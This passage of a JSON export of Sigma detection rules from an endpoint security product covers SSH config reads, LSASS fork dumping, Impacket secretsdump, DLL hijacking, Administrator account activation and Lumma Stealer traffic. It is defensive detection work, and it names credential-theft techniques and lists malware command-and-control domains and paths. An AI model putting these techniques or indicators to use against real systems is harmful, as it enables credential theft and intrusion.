'/usr/bin/zellij'\n - '/home/*/.cargo/bin/zellij'\n\n exclusion_fish_autocomplete_2:\n ProcessImage: '/usr/bin/fish'\n ProcessParentCommandLine: '/usr/bin/python3 /usr/bin/terminator'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_ansible_script:\n ProcessCommandLine|contains: '/tmp/ansible-tmp-*/AnsiballZ_dnf.py'\n\n exclusion_ansible_connection:\n # /data/infra/ansible/bin/python3.9 /data/infra/ansible/bin/ansible-connection 1042369 303ea700-b19a-4de9-0ebc-000000000015\n ProcessCommandLine: '/*/ansible/bin/python3.* /*/ansible/bin/ansible-connection * ????????-????-????-????-????????????'\n\n exclusion_wezterm_gui:\n ProcessImage: '/usr/bin/wezterm-gui'\n\n exclusion_clamscan:\n ProcessImage: '/usr/bin/clamscan'\n\n exclusion_tanium:\n ProcessParentCommandLine|startswith: '/bin/bash /opt/tanium/taniumclient/vb/tempunix_'\n\n exclusion_containerd:\n - ProcessImage: '/usr/bin/containerd'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/containerd|'\n\n exclusion_x2goclient:\n ProcessCommandLine:\n - 'x2goclient'\n - '/usr/bin/x2goclient'\n\n # Many different software use a feature that will use sed -ne to read into the SSH configuration file to find values.\n # For instance, opening a terminal and typing \"ssh sr\" and then pressing tab, will cause bash to generate the following command:\n # sed -ne 
s/^[[:blank:]]*[Hh][Oo][Ss][Tt][[:blank:]]\\(.*\\)$/\\1/p /etc/ssh/ssh_config /home/user1/.ssh/config\n # There are many of these patterns that may be used, so we preferred to simply whitelist the sed -ne commands here.\n exclusion_autocomplete:\n ProcessCommandLine|startswith: 'sed -ne'\n\n exclusion_kalilab:\n ProcessCommandLine: '/usr/bin/php /var/www/kalilab/scripts/checkServeur.php'\n\n exclusion_augtool:\n ProcessImage: '/usr/bin/augtool'\n\n exclusion_rubycat:\n ProcessImage:\n - '/usr/bin/rubycat-sshproxy'\n - '/usr/bin/rubycat-w3shproxy'\n\n exclusion_tripwire:\n ProcessImage: '/usr/sbin/tripwire'\n\n exclusion_convert2rhel:\n ProcessCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n exclusion_proxmox:\n ProcessImage: '/usr/local/sbin/proxmox-backup-client'\n\n exclusion_codium:\n ProcessImage:\n - '/usr/share/codium/codium'\n - '/opt/vscodium-bin/codium'\n\n exclusion_grep:\n ProcessCommandLine:\n - 'grep * /'\n - 'grep * /etc'\n - 'grep * /etc/'\n - 'grep --color=auto -R *'\n\n exclusion_awk:\n ProcessImage:\n - '/usr/bin/gawk'\n - '/usr/bin/mawk'\n ProcessCommandLine|startswith: 'awk sub(\"^[ \\t]'\n\n exclusion_puppet:\n ProcessCommandLine|startswith:\n - '/usr/bin/ruby /usr/bin/puppet agent '\n - '/usr/bin/ruby /usr/bin/facter '\n\n # https://blog.remirepo.net/\n exclusion_remi:\n ProcessImage: '/opt/remi/php83/root/usr/bin/php'\n\n exclusion_borg:\n ProcessCommandLine|startswith: '/usr/bin/python* /usr/bin/borg '\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "496c255d-2d49-4b7d-9693-b89edbc5e17d",
"rule_name": "SSH Client Configuration Read",
"rule_description": "Detects an attempt to read the content of the SSH client configuration file.\nThe SSH client configuration contains the security settings used by the SSH client.\nAn attacker can read the SSH client configuration to find weaknesses in those settings.\nIt is recommended to investigate the process performing the read operation and to look for other malicious actions stemming from it.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1484",
"attack.t1563.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "496ce697-ec9d-4248-b8af-e516a75b74ec",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075101Z",
"creation_date": "2026-03-23T11:45:34.075103Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075108Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/D4stiny/ForkPlayground/",
"https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_memory_dump_forkdump.yml",
"content": "title: LSASS Process Accessed with Fork-related Privilege\nid: 496ce697-ec9d-4248-b8af-e516a75b74ec\ndescription: |\n Detects an LSASS process access with a single privilege, required to create a fork process.\n Adversaries may create a fork of the LSASS process and dump its memory instead of accessing original LSASS' memory to bypass security solutions.\n It is recommended to analyze the source process for malicious behavior.\nreferences:\n - https://github.com/D4stiny/ForkPlayground/\n - https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2024/01/26\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetProcessImage|endswith: '\\lsass.exe'\n GrantedAccessStr: 'PROCESS_CREATE_PROCESS'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "496ce697-ec9d-4248-b8af-e516a75b74ec",
"rule_name": "LSASS Process Accessed with Fork-related Privilege",
"rule_description": "Detects an access to the LSASS process that requests only the single access right required to create a fork of it.\nAdversaries may create a fork of the LSASS process and dump the fork's memory instead of accessing the original LSASS process's memory, in order to bypass security solutions.\nIt is recommended to analyze the source process for malicious behavior.\n",
"rule_creation_date": "2024-01-26",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "498a0b65-6788-4347-b4b0-645b52399252",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618521Z",
"creation_date": "2026-03-23T11:45:34.618523Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618527Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/secretsdump.py#L795",
"https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/secretsdump.py#L799",
"https://attack.mitre.org/techniques/T1003/004/"
],
"name": "t1003_004_secretsdump_lsa_secrets.yml",
"content": "title: SAM database Dumped via Impacket Secretsdump\nid: 498a0b65-6788-4347-b4b0-645b52399252\ndescription: |\n Detects via a filename heuristic when Secretsdump.py, a tool from the Impacket framework, dumps the SAM or SECURITY hive to disk in order to parse secret keys or password hashes.\n This tool is often used by attackers to extract sensitive information and perform credential dumping as part of lateral movement.\n The dumped files are typically stored in the %SystemRoot%\\System32 or %Temp% directories with a random filename containing an 8-character prefix and a \".tmp\" extension (e.g., C:\\Windows\\System32\\kzqAwMLN.tmp).\n It is recommended to investigate the source of this activity by correlating this alert with authentications and network requests.\n Additionally, ensure that the Impacket framework is being used legitimately in your environment (for example, as a penetration testing exercise).\nreferences:\n - https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/secretsdump.py#L795\n - https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/secretsdump.py#L799\n - https://attack.mitre.org/techniques/T1003/004/\ndate: 2020/10/06\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.004\n - attack.t1078\n - classification.Windows.Source.Filesystem\n - classification.Windows.Framework.Impacket\n - classification.Windows.HackTool.Secretsdump\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n # this is actually performed by Remote Registry service in a svchost process :\n # - 2012 : shared with other services\n # - win10 : it's own process with commandline 'C:\\\\Windows\\\\system32\\\\svchost.exe -k localService -p -s RemoteRegistry' for instance\n Image|endswith: '\\svchost.exe'\n Path:\n - '?:\\windows\\system32\\\\????????.tmp'\n - '?:\\Windows\\Temp\\\\????????.tmp'\n\n 
exclusion_legitimate_svchost:\n - ProcessCommandLine:\n - '?:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s UmRdpService'\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n - '?:\\Windows\\system32\\svchost.exe -k UserProfileService -p -s ProfSvc'\n - '?:\\windows\\system32\\svchost.exe -k osrss -s osrss'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s BITS'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n - ProcessCommandLine: '?:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted'\n Path: '?:\\Windows\\Temp\\prn*.tmp'\n\n exclusion_known_prefix:\n Path: '?:\\Windows\\Temp\\TMP4352$.tmp'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "498a0b65-6788-4347-b4b0-645b52399252",
"rule_name": "SAM database Dumped via Impacket Secretsdump",
"rule_description": "Detects via a filename heuristic when Secretsdump.py, a tool from the Impacket framework, dumps the SAM or SECURITY hive to disk in order to parse secret keys or password hashes.\nThis tool is often used by attackers to extract sensitive information and perform credential dumping as part of lateral movement.\nThe dumped files are typically stored in the %SystemRoot%\\System32 or %Temp% directories with a random filename containing an 8-character prefix and a \".tmp\" extension (e.g., C:\\Windows\\System32\\kzqAwMLN.tmp).\nIt is recommended to investigate the source of this activity by correlating this alert with authentications and network requests.\nAdditionally, ensure that the Impacket framework is being used legitimately in your environment (for example, as a penetration testing exercise).\n",
"rule_creation_date": "2020-10-06",
"rule_modified_date": "2025-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.004",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4996243a-ea42-46d9-a1b0-e483d412ded9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098363Z",
"creation_date": "2026-03-23T11:45:34.098365Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098370Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_resmon.yml",
"content": "title: DLL Hijacking via resmon.exe\nid: 4996243a-ea42-46d9-a1b0-e483d412ded9\ndescription: |\n Detects potential Windows DLL Hijacking via resmon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'resmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4996243a-ea42-46d9-a1b0-e483d412ded9",
"rule_name": "DLL Hijacking via resmon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via resmon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "49bc86b5-f934-4b46-9a06-d622421cdc35",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089934Z",
"creation_date": "2026-03-23T11:45:34.089936Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089940Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#administrator",
"https://attack.mitre.org/techniques/T1078/001/"
],
"name": "t1078_001_administrator_account_enabled.yml",
"content": "title: Built-in Administrator Account Enabled\nid: 49bc86b5-f934-4b46-9a06-d622421cdc35\ndescription: |\n Detects the activation of the built-in Administrator account.\n This account is disabled by default on workstations and can be used by attackers to maintain persistent access to a victim system.\n It is recommended to investigate this action to determine its legitimacy and to review any suspicious authentications using the Administrator account.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#administrator\n - https://attack.mitre.org/techniques/T1078/001/\ndate: 2023/12/12\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.initial_access\n - attack.t1078.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.AccountManipulation\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4722\n TargetSid|endswith: '-500'\n\n filter_system:\n SubjectUserSid: S-1-5-18\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "49bc86b5-f934-4b46-9a06-d622421cdc35",
"rule_name": "Built-in Administrator Account Enabled",
"rule_description": "Detects the activation of the built-in Administrator account.\nThis account is disabled by default on workstations and can be used by attackers to maintain persistent access to a victim system.\nIt is recommended to investigate this action to determine its legitimacy and to review any suspicious authentications using the Administrator account.\n",
"rule_creation_date": "2023-12-12",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "49c66d4d-9c2f-494f-8e7b-c7c7eb891011",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091616Z",
"creation_date": "2026-03-23T11:45:34.091618Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091622Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1071_001_lumma_stealer_url_request.yml",
"content": "title: URL Request Related to Lumma Stealer\nid: 49c66d4d-9c2f-494f-8e7b-c7c7eb891011\ndescription: |\n Detects requests to URLs related to Lumma Stealer.\n Lumma Stealer is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022.\n It is recommended to investigate the request performed by the process to determine its legitimacy.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2024/08/17\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - attack.command_and_control\n - attack.t1071.001\n - attack.exfiltration\n - attack.t1041\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Stealer.LummaStealer\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection_generic_v1:\n RequestUrlPath: '/c2sock'\n RequestUrlVerb: 'POST'\n\n selection_generic_v2:\n RequestUrlHost|endswith:\n - '.shop'\n - '.site'\n - '.biz'\n RequestUrlPath: '/api'\n RequestUrlVerb: 'POST'\n\n selection_domain:\n RequestUrlHost|endswith:\n - '.quickworld.shop'\n - '.experttech.shop'\n - '.techresource.shop'\n - '.prinntypainrwi.shop'\n - '.pang-scrooge-carnage.shop'\n - '.claimconcessionrebe.shop'\n - '.divosrcemusemutati.shop'\n - '.gemcreedarticulateod.shop'\n - '.liabilityarrangemenyit.shop'\n - '.secretionsuitcasenioise.shop'\n - '.filetip.shop'\n - '.denbangladeesk.ru'\n - '.malazika.icu'\n - '.nvsrvmgr.org'\n - '.agentyanlark.site'\n - '.bakedgooak.site'\n - '.bellykmrebk.site'\n - '.commandejorsk.site'\n - '.delaylacedmn.site'\n - '.famikyjdiag.site'\n\n condition: 1 of selection_*\nlevel: high\n#level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "49c66d4d-9c2f-494f-8e7b-c7c7eb891011",
"rule_name": "URL Request Related to Lumma Stealer",
"rule_description": "Detects requests to URLs related to Lumma Stealer.\nLumma Stealer is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022.\nIt is recommended to investigate the request performed by the process to determine its legitimacy.\n",
"rule_creation_date": "2024-08-17",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1005",
"attack.t1041",
"attack.t1071.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "49c85d57-bba9-4d25-8825-752b9581d109",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589486Z",
"creation_date": "2026-03-23T11:45:34.589490Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589498Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fixmapi.yml",
"content": "title: DLL Hijacking via fixmapi.exe\nid: 49c85d57-bba9-4d25-8825-752b9581d109\ndescription: |\n Detects potential Windows DLL Hijacking via fixmapi.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fixmapi.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mapistub.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "49c85d57-bba9-4d25-8825-752b9581d109",
"rule_name": "DLL Hijacking via fixmapi.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fixmapi.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "49c89875-fa13-4a83-a71b-911e70858184",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079798Z",
"creation_date": "2026-03-23T11:45:34.079800Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079804Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
